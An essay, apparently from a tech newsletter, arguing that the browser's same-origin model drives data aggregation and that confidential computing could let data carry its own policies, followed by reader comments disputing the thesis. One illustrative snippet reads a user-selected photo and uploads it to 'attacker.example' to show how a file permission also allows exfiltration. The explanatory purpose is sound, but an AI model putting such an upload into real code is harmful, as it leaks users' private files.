
Why Aggregators Ate the Internet

The hidden architectural choice that makes big platforms bigger—and how we could change the rules for AI


In the most recent episode of AI & I, former Stripe and Google executive Alex Komoroske referenced the “same-origin paradigm”—a security decision made by Netscape engineers in the 1990s that has inadvertently shaped our digital landscape. In today’s Thesis, Alex explains how this choice created the conditions for big tech monopolies by forcing our data into silos, making it nearly impossible to move information between apps without friction. The good news: AI has reached an inflection point such that new technologies could finally break this cycle. Imagine a personal research assistant that understands your note-taking system, a financial tracker customized to your budgeting approach, or a task manager that adapts to your changing work style—read on to learn more.—Kate Lee



There's a bug in the operating system of the internet. It's why your photos are trapped in Apple’s ecosystem, why you can’t easily move your data between apps, and why every new app starts from scratch, knowing nothing about you. Most importantly, it's why the AI revolution—for all its promise—risks making big tech companies even bigger instead of putting powerful tools in your hands.

The bug is called the same origin paradigm. It's a historical accident—a quick fix the Netscape browser team implemented one night in the 1990s that somehow became the invisible physics of modern software. Once you understand how it works, you can't unsee it. You start to notice how every frustration with modern technology traces back to this one architectural choice.

I've spent more than a decade as a product manager and strategist at companies like Stripe and Google. I've seen waves of technology promise to change everything—mobile, social, cloud. But there's a pattern: Each wave makes the biggest companies bigger. Every "revolution" reinforces the existing structures instead of empowering us to create new ones. And it all goes back to the same origin paradigm.

Now it's AI's turn.

The good news? For the first time in decades, we might be able to fix it. The tools to transcend the same origin paradigm are already here.

But first, we need to understand what we're dealing with.


The hidden physics of software

Here's how the same origin paradigm works: Every website, every app, is its own universe. The browser treats amazon.com and google.com as completely separate worlds that can never intersect. It’s the same with the Instagram app and the Uber app on your phone. The isolation is absolute—your data in one origin might as well be on Mars as far as other origins are concerned.

This creates what I call the iron triangle of modern software. It's a constraint that binds the hands of system designers—the architects of operating systems and browsers we all depend on. These designers face an impossible choice. They can build systems that support:

  1. Sensitive data (your emails, photos, documents)
  2. Network access (ability to communicate with servers)
  3. Untrusted code (software from developers you don't know)

But they can only enable two at once—never all three. If untrusted code can both access your sensitive data and communicate over the network, it could steal everything and send it anywhere.

So system designers picked safety through isolation. Each app becomes a fortress—secure but solitary. Want to use a cool new photo organization tool? The browser or operating system forces a stark choice: Either trust it completely with your data (sacrificing the "untrusted" part), or keep your data out of it entirely (sacrificing functionality).

Even when you grant an app or website permission only to look at your photos, you're not really saying, "You can use my photos for this specific purpose." You're saying, "I trust whoever controls this origin, now and forever, to do anything they want with my photos, including sending them anywhere." It's an all-or-nothing proposition.
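You can see the all-or-nothing grant in a real browser API. The sketch below uses the File System Access API (currently Chromium-only; TypeScript declarations ship separately as @types/wicg-file-system-access). Once the user picks a photo, the platform has no way to express "read it but never transmit it," so nothing stops the page from uploading it—the endpoint here is made up for illustration:

```typescript
// Sketch: the grant is "this page may read this file";
// network access comes bundled for free.
async function organizePhoto(): Promise<void> {
  // A user gesture is required; the picker itself is the permission prompt.
  const [handle] = await window.showOpenFilePicker({
    types: [{ description: "Photos", accept: { "image/*": [".jpg", ".png"] } }],
  });
  const file = await handle.getFile();

  // ...do the promised local organizing...

  // But the same grant also allows this. The browser cannot distinguish
  // "use my photo" from "exfiltrate my photo."
  await fetch("https://attacker.example/upload", { method: "POST", body: file });
}
```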

The aggregation ratchet

This architectural decision creates friction every time data needs to move between apps or websites. But friction in digital systems doesn't just slow things down. It fundamentally reshapes where data accumulates.

Think about water flowing down a mountainside. Every obstacle creates resistance, but that resistance doesn't stop the water—it redirects it. Over time, the water carves channels. Those channels, once formed, attract even more water. What starts as a trickle becomes a stream, then a river.

Data follows the same principle.

Consider how you might plan a trip: You've got flights in your email, hotel confirmations in another app, restaurant recommendations in a Google document, and your calendar in yet another tool. Every time you need to connect these pieces, you have to manually copy, paste, reformat, repeat. So you grant one service (like Google) access to all of it. Suddenly there's no friction. Everything just works. Later, when it comes time to share your trip details with your fellow travelers, you follow the path of least resistance: It’s simply easier to use the service that already knows your preferences, history, and context.

The service with the most data can provide the most value, which attracts more users, which generates more data. Each click of the ratchet makes it harder for new entrants to compete. The big get bigger not because they're necessarily better, but because the physics of the system tilts the playing field in their favor.

This isn't conspiracy or malice. It's emergent behavior from architectural choices. Water flows downhill. Software with the same origin paradigm aggregates around a few dominant platforms.

Why AI changes everything (and nothing)

Enter artificial intelligence. LLMs represent something genuinely new: They make software creation effectively free. A competent developer with AI assistance can build in hours what used to take weeks. An experienced user can create basic tools without writing a line of code.

This enables what we might call "infinite software"—an endless variety of tools tailored to every conceivable need. Why does this matter? Because software has always been constrained by economics. Building an app costs money, so developers only build for large markets. Your specific workflow, your unique needs, your personal system—none of these are worth a product manager's time unless they also happen to be shared by millions of other users.

When the marginal cost of creating software approaches zero, though, everything changes. We could have:

  1. A custom tool for managing your kids' dietary restrictions across multiple family calendars
  2. A personal research assistant that understands your note-taking system
  3. A financial tracker designed around your specific approach to budgeting
  4. A task manager that reshapes itself around your changing work style

Researcher Geoffrey Litt and his co-authors capture this potential beautifully in their recent paper, "Malleable Software in the Age of AI." They envision a world where software is no longer rigid and predetermined but fluid and shapeable—where users become co-creators of their tools rather than passive consumers.

But infinite software distributed through today's app stores doesn't solve our problems—it amplifies them. More apps mean more silos, more places your data gets trapped, and more fragments to orchestrate. As Litt notes, it's like "bringing a talented sous chef to a food court." We have the capability to create personalized software experiences, but we're stuck serving them up in the same old containers.

AI needs context to be useful. An AI that can see your calendar, email, and documents together might actually help you plan your day. One that only sees fragments is just another chatbot spouting generic advice. But our current security model—with policies attached at the app level—makes sharing context an all-or-nothing gamble.

So what happens? What always happens: The path of least resistance is to put all the data in one place.

Think about what we're trading away: Instead of the malleable, personal tools that Litt envisions, we get one-size-fits-all assistants that require us to trust megacorporations with our most intimate data. The same physics that turned social media into a few giant platforms is about to do the same thing to AI.

We only accept this bad trade because it’s all we know. It’s an architectural choice made before many of us were born. But it doesn’t have to be this way—not anymore.

Why now? The foundations for change

For decades, transcending the same origin paradigm would have been impossible. But the technical pieces for a fundamentally different approach are finally emerging.

Modern processor chips from Intel, AMD, and ARM now include something called Confidential Compute—secure enclaves that create regions of memory fully encrypted and protected from everyone, including cloud administrators. These technologies make it possible to run workloads in public clouds that were previously too sensitive for them, and they are already securing billions of dollars in financial transactions and defense workloads.

These secure enclaves can also do something called remote attestation. They can provide cryptographic proof—not just a promise, but mathematical proof—of exactly what software is running inside them. It's like having a tamper-proof seal that proves the code handling your data is exactly what it claims to be, unmodified and uncompromised.
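In code, verifying an attestation looks something like the sketch below. The field names and vendor-key plumbing are illustrative assumptions—Intel SGX, AMD SEV-SNP, and ARM CCA each define their own quote formats—but the three checks are the heart of every scheme:

```typescript
import { createHash, verify } from "node:crypto";

// Illustrative quote structure; real formats differ, but all carry
// some version of these three fields.
interface AttestationQuote {
  measurement: Buffer; // hash of the exact code loaded into the enclave
  reportData: Buffer;  // caller-chosen value binding the quote to this session
  signature: Buffer;   // produced by a key that chains up to the CPU vendor
}

function verifyQuote(
  quote: AttestationQuote,
  vendorPublicKeyPem: string,  // assumed: obtained out-of-band from the vendor's PKI
  expectedMeasurement: Buffer, // hash of the audited build we agreed to trust
  nonce: Buffer,               // fresh random value we sent with the request
): boolean {
  const signed = Buffer.concat([quote.measurement, quote.reportData]);
  // 1. Genuine hardware: the signature proves a real enclave produced the quote.
  const genuine = verify("sha256", signed, vendorPublicKeyPem, quote.signature);
  // 2. Known code: the measurement proves *which* software is running inside.
  const rightCode = quote.measurement.equals(expectedMeasurement);
  // 3. Freshness: echoing our nonce proves the quote wasn't replayed.
  const fresh = quote.reportData.equals(createHash("sha256").update(nonce).digest());
  return genuine && rightCode && fresh;
}
```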

Combine these ingredients in just the right way and, for the first time, policies can be attached not to apps but to data itself. Every piece of data could carry its own rules about how it can be used. Your photos might say, "Analyze me locally but never transmit me." Your calendar might allow, "Extract patterns but only share aggregated insights in a way that is provably anonymous." Your emails could permit reading but forbid forwarding. This breaks the iron triangle: Untrusted code can now work with sensitive data and have network access, because the policies themselves—not the app's origin—control what can be done with the data.
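Here's a hypothetical sketch of what policy-carrying data could look like. None of these names come from a shipping standard—the vocabulary is invented for illustration—but it makes the inversion concrete: the rules travel with the data, and the attested runtime, not the app developer, enforces them.

```typescript
// Hypothetical policy vocabulary, invented for illustration.
type Capability = "read" | "analyze-locally" | "transmit" | "share-aggregated";

interface PolicyWrapped<T> {
  payload: T;          // decrypted only inside an attested enclave
  allow: Capability[]; // what any code, trusted or not, may do with it
  deny: Capability[];  // hard prohibitions no app can override
}

// "Analyze me locally but never transmit me."
const photos: PolicyWrapped<Uint8Array[]> = {
  payload: [],
  allow: ["read", "analyze-locally"],
  deny: ["transmit"],
};

// The attested runtime, not the photo app, evaluates every request.
function request<T>(data: PolicyWrapped<T>, action: Capability): T {
  if (data.deny.includes(action) || !data.allow.includes(action)) {
    throw new Error(`policy forbids "${action}"`);
  }
  return data.payload;
}

request(photos, "analyze-locally"); // ok: the tool can organize your library
// request(photos, "transmit");     // throws: the iron triangle is broken
```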

The path forward

What would become possible if we could guarantee that data policies were always respected? If code could work with your most sensitive data without the code's creator ever being able to see it? If every app were remotely attestable—verifiably trustworthy regardless of who made it?

These aren't just theoretical questions anymore. The building blocks exist. The real question is whether we'll use them to imagine something genuinely new—a different physics for how software and data interact in the age of AI.

For once, we’re on the brink of a revolution that can deliver on its promises: tools that feel like extensions of your will, private by default, adapting to your every need—software that works for you, not on you.

The same origin paradigm got us here, but it doesn't have to define where we go next. We built these systems. We can build better ones.


Alex Komoroske is the CEO and cofounder of Common Tools. He was previously the head of corporate strategy at Stripe and a director of product management at Google.

Comments

Backofthenapkin about 7 hours ago

🚧 The Bug Beneath the Browser
Reading Alex Komoroske’s sharp post on the same-origin paradigm had me nodding—until the pivot to AMD’s secure enclaves. A solid feature, sure. But a narrow fix to a systemic problem.

The flaw isn’t in the chip. It’s in the model.
What’s broken is how we authorize, move, and trust data online.

Here’s why hardware-bound solutions won’t solve the deeper architecture problem:

🌱 Too Local: CPU fixes assume data lives in one secure zone. But like people, data needs to move, combine, and adapt.
🌾 Weeds in the Garden: Healthy systems allow messy overlap. Ecosystem diversity—not lockdown—is what drives innovation.
🌊 The River Always Wins: A rock can block flow. But real resilience comes from trees, soil, and balance. Nature distributes control—and software should too.

Komoroske nails the true villain: the same-origin paradigm. It traps your data in silos, makes permission binary, and rewards companies that aggregate context at scale. The result? Big gets bigger.

🧩 What we need isn’t tighter perimeters—it’s a system where trust, access, and privacy aren’t locked in a zero-sum game.

That’s why I’m following researchers like Geoffrey Litt, who’s pushing decomposable documents and malleable software. Instead of rigid apps, we get fluid tools that operate on user-owned, user-governed data. You bring the tool to the context, not the other way around.

🔑 The future of AI isn’t in the model or the chip. It’s in the architecture of agency.

Dan Shipper about 6 hours ago

@backofthenapkin this seems very AI generated

Backofthenapkin about 6 hours ago

@danshipper What magic decoder ring are you using? I write with a partner to sharpen for clarity and brevity. Feels like common sense, not a conspiracy. Like your business, clarity is currency. I don’t mind splitting the check with AI.

Oshyan Greene about 6 hours ago

I don't understand how your thesis that Same Origin is responsible for data silos can really be justified. APIs exist, they can have any rules the developers want them to, the auth can work in whatever way is desired/can be developed. People already trust many big companies with their data, with little or no assurance of genuine privacy or confidentiality of data. People tell secrets to AI every day without considering who has access to it and what they might do with it. People take nude pics all the time, put it up on the cloud, and get hacked. These problems aren't solved by Confidential Compute. And as far as permissions and sharing, some people like myself have photos in both Amazon and Google Clouds, our use of them is based on trust of those orgs, the lack of their ability to communicate with one another is *not* a trust issue. Google and Amazon simply have no incentive to provide data interchange in that context. The reason trusting Google with everything works is that they provide services that cover a wide range of common use cases, and they (generally) handle the integration between them internally. Again none of this has to do with Same Origin.

So the reason better data exchange systems haven't been developed before now is not, in my view, a technical one but simply an incentive one in the capitalist market. Companies could have put resources into creating open systems with good permissions models but they have no financial incentive to do so. They still don't, at least not significant ones. Maybe that will change with AI, but I don't see the case being laid out that clearly above.

Federated systems with granular permissions systems already exist, they prove that tech is not the underlying issue. No need for a fancy Confidential Compute implementation, which anyway relies on trust, i.e. I can send my data to a novel 3rd party for some unique service not provided by the larger trusted data silo I use, but I have to have reason to trust that 3rd party, and data security in processing is a small part of that concern at a practical level. As I noted above confidentiality of data at runtime is generally not a concern for the mass market, as evidenced by people's use of social media, and now AI tools. Blockchain implementations likewise exist to solve similar trust issues. Confidential Compute is a red herring for this problem domain, though it obviously solves some important issues for business customers, and others that could actually be important for the AI age as we as consumers have more and more incentive to share ever more sensitive information with AI companies. But again that's a separate issue from Same Origin *and* from data interchange. At least as far as I can see.

Have I misunderstood the entire argument here?